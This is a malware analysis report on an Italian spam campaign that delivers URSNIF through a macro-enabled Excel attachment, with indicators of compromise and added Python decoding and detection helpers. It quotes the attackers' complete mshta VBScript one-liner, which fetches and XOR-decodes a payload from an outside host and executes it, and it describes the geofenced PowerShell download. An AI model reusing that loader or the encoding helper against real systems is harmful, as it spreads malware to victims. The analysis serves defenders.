Detailed Technical Analysis Report of Spam Campaign Delivers URSNIF Malware
Malware, Trojan, Malware Analysis | 08/01/2018




Italian Spam Campaign Delivers URSNIF Malware: Overview

Recently a new malware campaign targeting Italy has been observed, in which the attacker sends phishing emails carrying either a malicious link or a malicious Office document as an attachment.

If the email contains a malicious link, clicking it downloads the malicious Office document.

In the other scenario, the malicious Office document is attached to the email directly.

In both scenarios, the document contains a malicious macro that automatically downloads additional malware onto the user's machine.


Flow Chart

Technical Analysis of the Italy Spam Campaign

 

File Name: ft.n.20008735_07_2018.xls

MD5: 49C824A7C49B1D69DC96B73E0850CC64

File Type: XLSX

Spread Via: E-mail


Detailed Description of the Italy Spam Campaign with Screenshots

During execution, ft.n.20008735_07_2018.xls launches the Microsoft Excel application.

By default, Microsoft Office applications have the Protected View feature turned on and macros disabled for security purposes.

If the user has disabled this protection mechanism and enabled macros, the warning notification does not pop up, and the document will harm the system.

So it is always recommended never to disable Protected View.

As shown below, the Enable Content bar displays another warning message ("Macros have been disabled").

Figure 1 Enable Content Warning

If the user clicks the Enable Content button or is not using Microsoft's default Protected View mode, the malicious macro starts automatically in the background.

As shown below, Excel.exe creates several child processes.

Figure 2 Process Tree

As shown below, ft.n.20008735_07_2018.xls contains a malicious macro that is neither clearly visible to nor easily understood by a normal user.

The macro code below has a Sub Workbook_Open() procedure, which means the malicious macro code is activated as soon as the workbook is opened.

Figure 3 Macro Code

By analyzing the above macro code, we found that it runs a malicious PowerShell script in the background.

As shown below, the bad actor hid column A, which contains the actual code. Once we unhide the column, we can easily see the malicious code the attacker placed in the spreadsheet.

Figure 4 Hidden Code

The following VBScript code is executed with the help of mshta.exe, the Microsoft HTML Application host, which is responsible for executing HTA files on the operating system.

 mshta vbscript:execute("On Error Resume Next:Set a=CreateObject(""MSXML2.ServerXMLHTTP.6.0""):a.setOption 2,13056:while(Len(b)=0):a.open""GET"",""hxxps://pagamento[.]us/abcd"",False:a.send:b=a.responseText:wend:k=""MDX01"":for i=0to Len(b)-1Step 2:c=c&Chr(Asc(Chr(""&H""&Mid(b,i+1,2)))xor Asc(Mid(k,((i/2)mod Len(k))+1,1))):Next:ExecuteGlobal c:")(window.close)"

 

As shown above, the VBScript attempts to connect to the URL hxxps://pagamento[.]us/abcd.

That downloads the "abcd" file (MD5: 502C874EFC385C925C6F02DC3C0555DB) onto the system; it contains the shellcode, which the VBScript decodes with its XOR loop.

Figure 5 Shell Code
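The decode loop in the mshta one-liner above, mirrored in Python as an added example (this is not code from the original report or from the malware): it reads the downloaded body as hex pairs, XORs each byte with the key "MDX01" cycled by byte index, and adds a known-plaintext key-recovery helper for variants that change the key. The response body used here is a constructed stand-in, not the real "abcd" sample.

```python
# Added example (not code from the original report): a Python mirror of the
# decoding loop in the VBScript above, plus a key-recovery helper for variants.

KEY = b"MDX01"   # key string k="MDX01" taken from the one-liner above


def decode_stage(hex_text: str, key: bytes = KEY) -> bytes:
    """Mirror of `for i=0 to Len(b)-1 step 2 ... Mid(b,i+1,2) xor Mid(k,(i/2) mod Len(k)+1,1)`:
    two hex digits form one byte; byte n is XORed with key[n mod len(key)]."""
    hex_text = "".join(hex_text.split())        # tolerate wrapped/whitespaced dumps
    if len(hex_text) % 2:
        raise ValueError("odd number of hex digits: truncated download?")
    data = bytes.fromhex(hex_text)
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_stage(plain: bytes, key: bytes = KEY) -> str:
    """XOR is its own inverse, so the same loop builds a response body."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(plain)).hex()


def recover_key(hex_text: str, known_prefix: bytes, key_len: int) -> bytes:
    """Known-plaintext key recovery for a variant that changed the key: the
    VBScript feeds the decoded text straight into ExecuteGlobal, so the
    plaintext usually opens with predictable VBScript (assumed prefix)."""
    data = bytes.fromhex("".join(hex_text.split()))
    if len(known_prefix) < key_len or len(data) < key_len:
        raise ValueError("need at least key_len bytes of plaintext and data")
    return bytes(data[i] ^ known_prefix[i] for i in range(key_len))


# Constructed stand-in for the downloaded "abcd" body (NOT the real sample):
# a harmless VBScript line obfuscated with the campaign's key.
SAMPLE_RESPONSE = encode_stage(b'MsgBox "second stage would run here"')

if __name__ == "__main__":
    print(decode_stage(SAMPLE_RESPONSE).decode())
    print(recover_key(SAMPLE_RESPONSE, b"MsgBox", 5))
```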

As shown below, the macro code launches PowerShell, which tries to connect to hxxps://pagamento[.]us/abc and download "ABC" (a PowerShell script, MD5: 7C93E3553CC4D1EEC930DC72ECF94985) that checks the victim's IP address.

If the user's IP address is in Italy, the malware is downloaded; otherwise it is not.

Figure 6 Malicious JSON

As shown above, the PowerShell code tries to download "relate.xlsx", which is actually a binary file, and saves it as helpcontrol.exe on the victim machine. If the victim's IP address maps to Italy, the script automatically downloads the payload into the %temp% folder.

Figure 7 Download Payload
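A hunting heuristic for the behaviour just described, written as an added example (not from the original report): it flags a script host such as powershell.exe or mshta.exe that queries a public IP-lookup service and then fetches another URL from the same process. The event lines and the payload host are constructed; the report does not name the server that served relate.xlsx.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample events (not from the original report), one outbound request
# per line, attributed to the issuing process; the payload host is a placeholder.
SAMPLE_EVENTS = """\
2018-07-30T10:15:01Z host=WS01 pid=4120 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe url=http://ipinfo.io/json
2018-07-30T10:15:02Z host=WS01 pid=4120 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe url=https://downloads.example.invalid/relate.xlsx
2018-07-30T10:16:40Z host=WS02 pid=772 image=C:\\Program Files\\Internet Explorer\\iexplore.exe url=http://ipinfo.io/json
2018-07-30T10:17:05Z host=WS02 pid=5000 image=C:\\Windows\\System32\\mshta.exe url=http://myip.opendns.com
"""

IP_LOOKUP_HOSTS = {"ipinfo.io", "myip.opendns.com"}      # services in the IOC list
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
EVENT_RE = re.compile(r"^(\S+) host=(\S+) pid=(\d+) image=(.+?) url=(\S+)$")


def parse_events(text):
    """Parse one event per line; lines that do not match the format are skipped."""
    out = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            ts, host, pid, image, url = m.groups()
            out.append({"ts": ts, "host": host, "pid": int(pid), "image": image, "url": url})
    return out


def find_geofence_downloads(events):
    """Alert when a script host queries an IP-lookup service and the same process
    then fetches another external URL: the check-country-then-download sequence."""
    by_proc = defaultdict(list)
    for ev in events:
        by_proc[(ev["host"], ev["pid"])].append(ev)
    alerts = []
    for (host, pid), evs in by_proc.items():
        image = evs[0]["image"].rsplit("\\", 1)[-1].lower()
        if image not in SCRIPT_HOSTS:
            continue                      # browsers legitimately hit these services
        lookup = None
        for ev in sorted(evs, key=lambda e: e["ts"]):
            if (urlparse(ev["url"]).hostname or "") in IP_LOOKUP_HOSTS:
                lookup = ev["url"]
            elif lookup:
                alerts.append({"host": host, "pid": pid, "image": image,
                               "lookup": lookup, "download": ev["url"]})
                break
    return alerts
```

A lookup with no follow-up request (the mshta.exe line in the sample) is deliberately not alerted on; raise it at lower severity if your environment has few legitimate script-host callers of these services.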

Once the malware is downloaded onto the victim machine, it creates the following further processes.

Figure 8 Process Tree

Helpcontrol.exe also contains anti-debugging techniques. It uses the following APIs and checks:

IsDebuggerPresent

GetTickCount

HeapFlags

 

IOCs

Associated Hashes

49C824A7C49B1D69DC96B73E0850CC64

502C874EFC385C925C6F02DC3C0555DB

7C93E3553CC4D1EEC930DC72ECF94985

Associated URL

hxxps://pagamento[.]us/abcd

hxxps://pagamento[.]us/abc

hxxp://ipinfo.io/json

hxxp://sev[.]sunballast[.]com/

hxxp://myip.opendns.com

hxxp://sev.trampcoproject.eu

hxxp://sev.fm604.com

 

Associated Files Created by HelpControl.exe


Associated MUTEXES

\Sessions\1\BaseNamedObjects\IsoScope_e3c_IESQMMUTEX_0_519

!PrivacIE!SharedMem!Mutex

\Sessions\1\BaseNamedObjects\Local\VERMGMTBlockListFileMutex

\Sessions\1\BaseNamedObjects\IsoScope_e3c_IESQMMUTEX_0_274

Associated Registry Entries

